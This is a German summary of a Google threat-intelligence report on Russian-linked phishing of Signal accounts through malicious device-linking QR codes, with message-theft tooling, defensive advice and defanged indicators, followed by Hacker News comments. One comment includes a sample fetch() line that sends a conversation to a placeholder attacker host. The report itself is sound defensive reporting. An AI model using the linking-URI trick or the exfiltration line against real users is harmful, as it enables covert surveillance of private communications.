Mit Russland verbundene Bedrohungsakteure nehmen Signal Messenger aktiv ins Visier
(cloud.google.com)- Signal-Konten von Personen, die für russische Nachrichtendienste von Interesse sind, werden gezielt angegriffen; Versuche zur Kontokompromittierung mit Fokus auf sensible Regierungs- und Militärkommunikation nehmen zu
- Die am weitesten verbreitete Methode missbraucht die legitime Funktion Linked Devices: Opfer werden dazu gebracht, einen bösartigen QR-Code zu scannen, danach werden Nachrichten in Echtzeit mit dem Gerät des Angreifers synchronisiert
- UNC5792 nutzt gefälschte Signal-Gruppeneinladungen, UNC4221 ein Kropyva-thematisches Phishing-Kit und gefälschte Sicherheitswarnungen, APT44 zielt über Zugriff auf erbeutete Geräte auf die Geräteverknüpfung
- APT44, Turla und das mit Belarus verbundene UNC1151 betreiben außerdem Funktionen zum Diebstahl von Signal-Datenbanken beziehungsweise Signal-Desktop-Nachrichten und -Anhängen in Android- und Windows-Umgebungen
- Das Problem ist nicht auf Signal beschränkt; auch WhatsApp und Telegram werden ähnlich ins Visier genommen. Nötig sind App-Updates, Prüfung verknüpfter Geräte, Vorsicht bei QR-Codes und eine starke Bildschirmsperre
Mit Russland verbundene Aktivitäten gegen Signal-Konten
- Die Google Threat Intelligence Group (GTIG) hat bestätigt, dass mehrere mit dem russischen Staat verbundene Bedrohungsakteure ihre Versuche ausweiten, Signal-Messenger-Konten zu kompromittieren
- Hauptziele sind Personen, die für russische Nachrichtendienste von Interesse sind; seit der erneuten Invasion der Ukraine treibt der Kriegsbedarf nach Zugriff auf sensible Regierungs- und Militärkommunikation diese Aktivitäten an
- Signal wird von Soldaten, Politikern, Journalisten, Aktivisten und Hochrisiko-Communities als sicherer Messenger genutzt und ist deshalb ein hochwertiges Ziel für Überwachungs- und Spionageaktivitäten
- Ähnliche Bedrohungen weiten sich auch auf andere populäre Messenger wie WhatsApp und Telegram aus; mit Russland verbundene Gruppen wenden dort ähnliche Techniken an
- Die neuesten Android- und iOS-Releases von Signal enthalten Härtungen, die bei der Abwehr ähnlicher Phishing-Kampagnen helfen
- Nutzer müssen auf die neueste Version aktualisieren, um diese Funktionen nutzen zu können
Missbrauch der Funktion Linked Devices
- Die neueste und am weitesten verbreitete Technik ist der Missbrauch der legitimen Signal-Funktion linked devices
- Signal verlangt beim Verknüpfen eines zusätzlichen Geräts normalerweise das Scannen eines QR-Codes, damit der Dienst gleichzeitig auf mehreren Geräten genutzt werden kann
- Bedrohungsakteure erstellen bösartige QR-Codes, durch deren Scan eine vom Angreifer kontrollierte Signal-Instanz mit dem Konto des Opfers verbunden wird
- Ist die Verknüpfung erfolgreich, werden nachfolgende Nachrichten in Echtzeit an das Opfer und den Angreifer synchron zugestellt; so lassen sich sichere Unterhaltungen weiter mitlesen, ohne das gesamte Gerät zu kompromittieren
- Bei Remote-Phishing werden bösartige QR-Codes meist wie folgt getarnt
- Signal-Gruppeneinladung
- Sicherheitswarnung
- Legitimer Hinweis zur Geräte-Kopplung auf der Signal-Website
- Bei stärker angepasstem Remote-Phishing wird der bösartige QR-Code zur Geräteverknüpfung in eine Phishing-Seite eingebettet, die wie eine von der ukrainischen Armee genutzte Spezialanwendung aussieht
- Dieselbe Methode wird auch bei Operationen mit physischem Nahzugriff eingesetzt
- APT44 ermöglicht es an der Front eingesetzten russischen Kräften, Signal-Konten auf erbeuteten Geräten mit vom Angreifer kontrollierter Infrastruktur zu verknüpfen, um sie anschließend auszunutzen
- Eine Kontokompromittierung über ein neu verknüpftes Gerät kann leicht zu einem signalarmen initialen Zugriff werden, weil zentrale technische Erkennungs- und Abwehrmechanismen fehlen
- Bei Erfolg besteht ein hohes Risiko, dass die Kompromittierung lange unbemerkt bleibt
UNC5792: manipulierte Signal-Gruppeneinladungen
- UNC5792 ist ein Cluster mutmaßlicher russischer Spionageaktivitäten und überschneidet sich teilweise mit UAC-0195 von CERT-UA
- Die Gruppe manipuliert legitime group invite-Seiten von Signal und nutzt sie in Phishing-Kampagnen
- Im legitimen Ablauf wird der Nutzer zu einer Signal-Gruppe weitergeleitet; die manipulierte Seite leitet das Opfer jedoch zu einer bösartigen URL, die ein vom Angreifer kontrolliertes Gerät mit dem Signal-Konto des Opfers verbindet
- Die vom Angreifer kontrollierte Infrastruktur ist so gestaltet, dass sie wie eine legitime Signal-Gruppeneinladung aussieht
- Das JavaScript der gefälschten Gruppeneinladung wird statt der üblichen Weiterleitung zum Beitritt zu einer Signal-Gruppe durch einen bösartigen Block ersetzt, der eine Signal-URI zur Verknüpfung eines neuen Geräts der Form
sgnl://linkdevice?uuid=enthält - Als Beispieldomain wurde
signal-groups[.]techidentifiziert
UNC4221: maßgeschneidertes Signal-Phishing-Kit
- UNC4221 ist ein mit Russland verbundener Bedrohungsakteur, den CERT-UA als UAC-0185 verfolgt; er nimmt aktiv Signal-Konten ukrainischer Soldaten ins Visier
- Die Gruppe betreibt ein maßgeschneidertes Signal-Phishing-Kit, das wie Komponenten der von der ukrainischen Armee zur Artillerieführung genutzten Anwendung Kropyva aussieht
- Ähnlich wie UNC5792 versteckt auch UNC4221 die Geräteverknüpfungsfunktion hinter einer Signal-Gruppeneinladung von einem scheinbar vertrauenswürdigen Kontakt
- Beobachtete Varianten des Phishing-Kits treten in mehreren Formen auf
- Eine Phishing-Website, die Opfer auf sekundäre Phishing-Infrastruktur weiterleitet, die wie eine legitime von Signal bereitgestellte Anleitung zur Geräteverknüpfung aussieht
- Eine Website, die direkt einen bösartigen QR-Code zur Geräteverknüpfung in das grundlegende Kropyva-thematische Phishing-Kit einbettet
- Eine Phishing-Seite aus frühen Operationen 2022, die wie eine legitime Signal-Sicherheitswarnung gestaltet war
- Beispieldomains und -seiten sind unter anderem
signal-confirm[.]site,teneta.add-group[.]siteundsignal-protect[.]host - UNC4221 nutzt als Kernkomponente des Signal-Targetings außerdem eine leichtgewichtige JavaScript-Payload namens PINPOINT
- PINPOINT sammelt über die GeoLocation API des Browsers grundlegende Nutzerinformationen und Standortdaten
- Bei künftigen ähnlichen Operationen dürften Sicherheitsnachrichten und Standortdaten gemeinsam ins Visier geraten
- Besonders im Kontext gezielter Überwachungsoperationen oder zur Unterstützung konventioneller Militäroperationen werden beide Datentypen zusammen angegriffen
Mit Russland und Belarus verbundene Aktivitäten zum Diebstahl von Signal-Nachrichten
- Neben der Verknüpfung zusätzlicher Geräte mit Opferkonten betreiben mehrere bekannte regionale Bedrohungsakteure Funktionen zum Diebstahl von Signal-Datenbankdateien von Android- und Windows-Geräten
- APT44 nutzt ein leichtgewichtiges Windows-Batch-Skript namens WAVESIGN
- Es fragt regelmäßig Signal-Nachrichten aus der Signal-Datenbank des Opfers ab
- Es exfiltriert aktuelle Nachrichten mit Rclone
- Die 2023 vom ukrainischen Security Service of Ukraine (SSU) und dem britischen National Cyber Security Centre (NCSC) gemeldete Android-Malware Infamous Chisel wird Sandworm zugeschrieben
- Sie ist darauf ausgelegt, auf Android-Geräten rekursiv nach einer Liste von Dateierweiterungen zu suchen, darunter lokale Datenbanken mehrerer Messenger-Apps einschließlich Signal
- Turla ist ein russischer Bedrohungsakteur, der dem russischen FSB Center 16 zugeschrieben wird
- Nach einer Kompromittierung betreibt Turla in Windows-Umgebungen ein leichtgewichtiges PowerShell-Skript, das Signal-Desktop-Nachrichten für den Abfluss vorbereitet
- Das mit Belarus verbundene UNC1151 nutzt das Befehlszeilenprogramm Robocopy
- Es staged die Inhalte des Dateiverzeichnisses, in dem Signal Desktop Nachrichten und Anhänge speichert, für eine spätere Exfiltration
Abwehrmaßnahmen für Nutzer sicherer Messenger
- Der Fokus mehrerer Bedrohungsakteure auf Signal zeigt, dass sich Bedrohungen gegen sichere Messenger-Anwendungen kurzfristig verschärfen könnten
- Zusammen mit dem Wachstum der kommerziellen Spyware-Industrie und der Zunahme mobiler Malware-Varianten in Konfliktregionen steigt die Nachfrage nach offensiven Cyber-Fähigkeiten zur Überwachung sensibler Kommunikation
- Die Bedrohung beschränkt sich nicht auf Remote-Cyber-Operationen wie Phishing und Malware-Auslieferung
- Auch Operationen mit physischem Nahzugriff, bei denen Angreifer kurzzeitig Zugriff auf ein entsperrtes Zielgerät haben, sind ein wichtiges Risiko
- Neben Signal gehören auch WhatsApp und Telegram zu den jüngsten Zielprioritäten mehrerer mit Russland verbundener Gruppen
- Microsoft Threat Intelligence behandelt in einem aktuellen Blogbeitrag eine Kampagne, bei der COLDRIVER, UNC4057 und Star Blizzard versuchten, die Funktion Linked Devices zur Kompromittierung von WhatsApp-Konten zu missbrauchen
- Nutzer, die Ziel staatlich unterstützter Eindringaktivitäten werden könnten, sollten folgende Sicherheitsgewohnheiten anwenden
- Auf allen Mobilgeräten eine Bildschirmsperre aktivieren und ein langes, komplexes Passwort mit Groß- und Kleinbuchstaben, Zahlen und Symbolen verwenden
- Android unterstützt alphanumerische Passwörter, die deutlich mehr Sicherheit bieten als numerische PINs oder Muster
- Betriebssystem-Updates möglichst zeitnah installieren und Signal sowie andere Messenger-Apps stets auf dem neuesten Stand halten
- Auf Android-Geräten mit Google Play Services Google Play Protect aktiviert lassen; es ist standardmäßig eingeschaltet
- In den App-Einstellungen im Abschnitt „Linked devices“ regelmäßig prüfen, ob nicht autorisierte Geräte vorhanden sind
- Vorsicht bei QR-Codes und Web-Ressourcen, die wie Software-Updates, Gruppeneinladungen oder andere Benachrichtigungen aussehen und zu sofortigem Handeln auffordern
- Wo möglich Zwei-Faktor-Authentifizierung wie Fingerabdruck, Gesichtserkennung, Sicherheitsschlüssel oder Einmalcodes verwenden, um Kontoanmeldungen oder die Verknüpfung neuer Geräte zu verifizieren
- iPhone-Nutzer, die gezielte Überwachung oder Spionage befürchten, sollten erwägen, den Lockdown Mode zu aktivieren, um die Angriffsfläche zu reduzieren
Kompromittierungsindikatoren und Zusammenfassung beobachteter Techniken
- Zur Unterstützung von Hunting und Identifikation in Organisationen sind Kompromittierungsindikatoren in einer GTI Collection für registrierte Nutzer enthalten
- Beispiele für zugehörige Kompromittierungsindikatoren sind
- UNC5792:
e078778b62796bab2d7ab2b04d6b01bf, Beispiel für manipulierten HTML-Code einer Gruppeneinladung - UNC5792 gefälschte Phishing-Seiten für Gruppeneinladungen:
add-signal-group[.]com,add-signal-groups[.]com,group-signal[.]com,groups-signal[.]site,signal-device-off[.]online,signal-group-add[.]com,signal-group[.]site,signal-group[.]tech,signal-groups-add[.]com,signal-groups[.]site,signal-groups[.]tech,signal-security[.]online,signal-security[.]site,signalgroup[.]site,signals-group[.]com - UNC4221 Phishing-Seiten mit Anleitung zur Geräteverknüpfung:
signal-confirm[.]site,confirm-signal[.]site - UNC4221 gefälschte Signal-Sicherheitswarnung:
signal-protect[.]host - UNC4221 gefälschte Kropyva-Gruppeneinladungen:
teneta.join-group[.]online,teneta.add-group[.]site,group-teneta[.]online,helperanalytics[.]ru,teneta[.]group,group.kropyva[.]site - APT44:
150.107.31[.]194:18000, dynamisch generierte QR-Codes zur Geräteverknüpfung, die von APT44 bereitgestellt wurden - APT44 WAVESIGN-Batch-Skripte:
a97a28276e4f88134561d938f60db495,b379d8f583112cad3cf60f95ab3a67fd,b27ff24870d93d651ee1d8e06276fa98
- UNC5792:
- Die beobachteten Taktiken und Techniken nach Bedrohungsakteur sind
- UNC5792: Remote-Phishing mit gefälschten Gruppeneinladungen, um Signal-Nachrichten des Opfers mit einem vom Angreifer kontrollierten Gerät zu koppeln
- UNC4221: Remote-Phishing mit gefälschten militärischen Webanwendungen und Sicherheitswarnungen, um Signal-Nachrichten des Opfers mit einem vom Angreifer kontrollierten Gerät zu koppeln
- APT44: Missbrauch physisch zugänglicher Geräte, um Signal-Nachrichten des Opfers mit einem vom Angreifer kontrollierten Gerät zu koppeln
- APT44: Versuch, mit der Android-Malware Infamous Chisel Signal-Datenbankdateien zu exfiltrieren
- APT44: Regelmäßige Exfiltration aktueller Signal-Nachrichten über Rclone mittels Windows-Batch-Skript
- Turla: Diebstahl von Signal-Desktop-Datenbanken nach Kompromittierung einer Windows-Umgebung
- UNC1151: Vorbereitung von Signal-Desktop-Dateiverzeichnissen für den Abfluss mit Robocopy
2 Kommentare
Zwar gibt es tatsächlich Schwachstellen, aber es ist schon lächerlich, dass ausgerechnet Telegram, das nicht einmal Gruppenchats richtig verschlüsselt, ausgerechnet in Sachen Sicherheit Kritik übt.
Meinungen auf Hacker News
Apps mit einem Workflow für verknüpfte Geräte wie Signal sind schon seit ziemlich langer Zeit riskant
Als Telegram letztes Jahr gegen Signal austeilte, wurde dieser Punkt ebenfalls angesprochen (https://news.ycombinator.com/context?id=40303736); und Signals Implementierung verknüpfter Geräte halte ich schon lange für problematisch: https://eprint.iacr.org/2021/626.pdf
Eher überraschend ist, dass es so lange gedauert hat, bis reale Angriffsbeispiele in der öffentlichen Literatur auftauchten. Dass Signal diesen Angriff außerhalb seines Threat Models sah, half auch nicht. Laut dem Paper erhielt Signal am 20. Oktober 2020 die Meldung und antwortete am 28. Oktober, dass die Kompromittierung langfristiger geheimer Schlüssel nicht Teil seines Angreifermodells sei
Dann müsste er physischen Zugriff auf eines der Geräte des Opfers haben oder eine andere Backdoor nutzen; an dem Punkt hat man doch eigentlich schon verloren. Bitte korrigieren, falls ich falsch liege. Physische Hardware-Sicherheit und Phishing-Schutz scheinen weiterhin entscheidend zu sein
Außerhalb eines Labors bekommt man ihn im Wesentlichen nur, indem man Root-Zugriff auf das Gerät des Nutzers erhält oder ein aktuelles Chat-Backup erbeutet. Die von Google entdeckte Kampagne ist eher Phishing und technisch weniger schwerwiegend, aber die Frage, wie man Nutzer davor warnt, dass sie gerade etwas Gefährliches tun, ist ein schwieriges Problem, das die gesamte Usable Security betrifft. Das wird bei Signal noch wichtiger, wenn beim Hinzufügen eines neu verknüpften Geräts auch der Nachrichtenverlauf und Anhänge der letzten 45 Tage kopiert werden
Was mir in letzter Zeit immer stärker auffällt: Ende-zu-Ende-Verschlüsselung setzt letztlich voraus, dass der Client vom Endnutzer selbst gebaut und verifiziert werden kann.
Ich baue gerade einen verschlüsselten, CRDT-basierten KI-Chatdienst; schon eine einzige Zeile
fetchoder ein Analyse-Tracker im Rendering macht die vom Protokoll zugesicherte Sicherheit wertlos. Darüber hinaus muss man sogar dem Betriebssystem vertrauen, auf dem das Rendering läuft.Selbst wenn man den Client Open Source macht und reproduzierbar bauen lässt, muss er über den iOS Store verteilt werden, und im Veröffentlichungsprozess kann alles Mögliche passieren. iOS nenne ich als Beispiel, weil es dort besonders schwierig ist, selbst gebaute Apps zu installieren. Bei Mehrparteien-Chats müsste auch die Gegenseite denselben Prozess durchlaufen.
Selbst mit allen möglichen großartigen Protokollen und bester Transportverschlüsselung läuft am Ende alles auf Vertrauen hinaus. Ich mache mir Sorgen, dass man bei etwas wie Signal unter der Illusion einer völlig sicheren Umgebung am Ende erst recht zum Überwachungsziel wird. Wenn eine Regierungsbehörde überwachen will, würde sie ihre Ressourcen vermutlich auf Signal-Nutzer konzentrieren, die am meisten zu verbergen haben.
Manchmal fühlt sich alles außer verschlüsseltem Storage bedeutungslos an. Es ist auch seltsam, dass die meisten Diskussionen bei der mathematischen Validität von Sicherheitsprotokollen stehen bleiben. Eine einzige Zeile wie
fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>)", {body: JSON.stringify(convo)})in der Rendering-Schicht kann alles umgehen; ich würde gern wissen, wie andere darüber denken.Vertrauen abzuschaffen scheint unmöglich; man verlagert nur, wem man vertraut, oder versteckt es hinter Abstraktionen. Wichtiger werden künftig Mechanismen sein, die klar nachweisen können, wenn eine in gewissem Maß vertraute Instanz böswillig handelt, und sie dafür verantwortlich machen.
Beispiele sind Certificate-Transparency-Logs gegen Man-in-the-Middle-Angriffe, reproduzierbare Builds zur Prüfung, ob ein empfangenes Binary zum veröffentlichten Open-Source-Code passt, oder Key Transparency, die bei WhatsApp/Signal/iMessage bestätigt, dass man nicht einen NSA-Schlüssel, sondern den erwarteten öffentlichen Schlüssel erhält.
Ein System, das zu sicher sein will, kann Nutzer daran hindern, ihre eigenen Nachrichten zu lesen, und sie am Ende in weniger sichere Systeme treiben. Auch bei Matrix gab es Probleme, weil Clients nicht klar genug kommunizierten, dass man Nachrichten dauerhaft verpassen kann, wenn man sich ausloggt.
Einige starke Anforderungen wie vollständige Forward Secrecy können praktisch mit dem kollidieren, was Nutzer von Messaging erwarten. Nutzer wollen: „Ich kann meine Nachrichten jederzeit sehen, aber niemand sonst kann sie jemals sehen“ – und das ist sehr schwer. Zwischen Sicherheit, Passwort-Reset und Wiederherstellung nach Verlust des Telefons besteht eine grundlegende Spannung.
Wenn Menschen die möglichen Folgen vollständig verstehen würden, würden viele vielleicht gar nicht die stärkste Ende-zu-Ende-Verschlüsselung wollen. Stattdessen könnten sie starke rechtliche Garantien wollen, etwa „Wer meine Nachrichten liest, geht lebenslang ins Gefängnis“. Manche wollen Sicherheit auf höchstem technischem Niveau, aber wenn man entlang dieser Priorität designt, kann das für Nutzer, die diese Kompromisse nicht akzeptieren, nach hinten losgehen.
Wer sich um dieses Sicherheitsniveau kümmert, wird sich bemühen, etwas anderes als ein iPhone zu nutzen. Dass Signal-Befürworter Nutzer von Kryptosystemen, die ihnen nicht gefallen, als LARPer bezeichnen, wirkt wie klassische Projektion. Abgesehen vielleicht von Leuten, die für die US-Regierung arbeiten, ist mir nicht klar, zu welchem Bedrohungsmodell Signal wirklich passt.
Es gibt sicher auch einen Streetlight Effect bei akademischen Kryptografieforschern, die sich auf mathematische Algorithmen konzentrieren. Heute ist der Bereich, für den man Sicherheitsforschungsgelder bekommen kann, etwas breiter und umfasst sogar Spielzeugmodelle von Ende-zu-Ende-Messaging-Protokollen, reicht aber immer noch nicht aus, um die tatsächlich wichtige gesamte Mensch-zu-Mensch-Strecke abzudecken.
Im Grunde signiert eine vertraute Wurzel und bestätigt damit zweifelsfrei, von welchem Telefon+Betriebssystem+App die Entität stammt, mit der man interagiert.
Android hat so etwas und kann Dritten zum Beispiel bestätigen, ob ein gesperrter Bootloader, eine Google-Signatur und ein Google-Betriebssystem laufen. Theoretisch wäre es auch möglich, eine andere Vertrauenskette zu haben, sodass ein Remote-Gegenüber „originale“ Software wie ein Google-Telefon+Lineage OS akzeptiert.
Auch Apps können App-Signaturen prüfen, auf die das Betriebssystem zugreifen kann, und sie bei Bedarf dem Remote-Gegenüber bereitstellen. Vollständig transparente Attestation-Artefakte, die nicht blind einer einzelnen Instanz wie Google vertrauen, könnten statt einer Signatur-Vertrauenswurzel ein Ledger verwenden, das die Hashes und Binaries der zu verifizierenden Komponenten enthält.
All das ist technisch möglich, aber heute nicht in einer tatsächlich praktikablen Form umgesetzt. Wenn das Interesse groß genug ist, wird es meiner Meinung nach irgendwann implementiert.
Damals war nichts verschlüsselt, auf öffentlichem WLAN irgendetwas zu tun war praktisch Russisch Roulette, und Signal-Intelligence-Behörden erlebten ein goldenes Zeitalter. Damals hatte Netzwerkverschlüsselung eine höhere Priorität.
Im Artikel steht es nicht ausdrücklich, aber so wie ich es verstehe, besteht der erste Schritt eines der Angriffe darin, das Smartphone eines gefallenen Soldaten an sich zu nehmen.
Wenn das gelingt, werden spätere Nachrichten in Echtzeit gleichzeitig an das Opfer und den Angreifer zugestellt.
Andererseits geben Smartphones jedem Soldaten ohne spezielle Schulung eine leistungsfähige Computer- und Kommunikationsplattform. Die Frage ist, wie man sie sicher macht, einschließlich der Risiken aus dem übergeordneten Kommentar.
Irgendjemand dürfte daran forschen, sie so weit abzusichern, dass selbst russische Geheimdienste sie nicht effektiv ausnutzen können. Wenn solche Lösungen breite Verbreitung finden, ließen sie sich auch gut auf die Privatsphäre von Zivilisten übertragen. Ukrainische Ziviltelefone vor russischen Angreifern zu schützen, ist ebenfalls keine schlechte Idee.
Falls damit gemeint ist, dass ein Gerät allein durch einmaliges Scannen eines QR-Codes verknüpft wird, wirkt das wie eine Lücke
Ein Gerät sollte nicht nur durch das Scannen des Codes verbunden werden können; es sollte eine manuelle Bestätigung geben, etwa „Ja, ich möchte dieses Gerät verknüpfen“. Dann könnte man merken, dass es in Wirklichkeit kein Gruppen-Einladungscode ist, selbst wenn man ihn dafür gehalten und gescannt hat. Natürlich muss der Nutzer es trotzdem bemerken, aber es wäre eine sinnvolle Verbesserung gegenüber „Ich dachte, ich scanne einen Code zum Beitritt zu einer Gruppe, und stillschweigend wurde ein anderes Gerät verknüpft“
Viele Nutzer verstehen Dinge wie QR-Codes, Links und Verknüpfungen nicht und denken auch nicht lange darüber nach. Sie tippen sofort und intuitiv nach ihrer Vermutung und klicken oft einfach, um etwas vom Bildschirm zu bekommen und zu dem zurückzukehren, was sie gerade getan haben. Ich weiß nicht, ob es eine Grundlage für die Annahme gibt, dass es keinen Bestätigungsschritt gibt; in der Signal-Dokumentation dürfte man das herausfinden können
Zugehöriger Artikel: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
Gesehen über https://news.ycombinator.com/item?id=43103692, aber dort gibt es keine Kommentare
Die gute Nachricht ist, dass es einen Grund gibt, warum Signal ins Visier genommen wird. Das bedeutet, dass Signal immer noch wirksam ist
Es gibt viele Stimmen, die sagen wollen, Signal sei kompromittiert, aber man sollte beachten, dass sie in fast allen Fällen weniger Open Source sind als Signal
Signal tut sein Bestes, um Menschenrechte zu schützen, obwohl es zu einem Unternehmen in Web-Größenordnung geworden ist. Die Würde des Einzelnen ist wichtig. Das ist kein bloßes Gespräch
Ich habe kurz auf der Website der Signal Foundation nach den Mitgliedern des Boards geschaut und Formulierungen wie Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow und Foreign Affairs Policy Board des U.S. Department of State gesehen
Solche Leute klingen, als gehörten sie zur Welt der Geheimdienste. Ich frage mich, was genau sie im Board von Signal, einer Open-Source-Messaging-App, tun. Dass es kein bloßes Gespräch ist, dem stimme ich zu
Wenn Signal sicher ist, werden diejenigen, die Privatsphäre angreifen, wollen, dass die Leute glauben, Signal sei kompromittiert, und etwas anderes verwenden. Wenn es nicht sicher ist, werden sie umgekehrt wollen, dass die Leute glauben, Signal sei sicher
Die Lösung besteht meiner Meinung nach darin, potenzielle Quellen von Falschinformationen vollständig zu ignorieren, insbesondere beliebige Nutzer in sozialen Medien. HN eingeschlossen. Das ist schwierig, wenn dort der soziale Mittelpunkt liegt, und man muss sich selbst davon ausschließen. Man sollte sich auf legitime und vertrauenswürdige Stimmen beschränken
„MongoDB ist Web Scale. Einfach einschalten, und es skaliert sofort“
Im Einstellungsmenü kann man prüfen, ob es unerwartete verknüpfte Geräte gibt
Etwa mit einem kleinen Icon wie „3 aktive verknüpfte Geräte“
Es wurden einige Domains genannt, aber nicht alle sind registriert
Zum Beispiel sind
signal-protect[.]hostundkropyva[.]siteverfügbar, währendsignal-confirm[.]sitein der Ukraine registriert ist. Einige sind in Russland registriertEinem Land im Krieg sollte man keiner Seite glauben. A beschuldigt B und B beschuldigt A, aber beide Seiten haben ihre eigene Agenda
signal-confirm[.]sitein der Ukraine registriert ist, sind WHOIS-Daten häufig gefälscht, daher ist es schwierig, sich darauf zu stützenRussland ist dafür bekannt, für solche Dinge auch gestohlene Zugangsdaten oder SIM-Karten aus Nachbarländern einschließlich der Ukraine zu verwenden
Leider haben auch russische staatliche Akteure kein Problem damit, innerhalb der Ukraine zu operieren. Nimmt man noch chaotische Kriminelle hinzu, die der Seite folgen, die mehr zahlt, sowie Menschen, die täglich zwischen russisch vorübergehend besetzten Gebieten und der Ukraine pendeln, wird es schnell kompliziert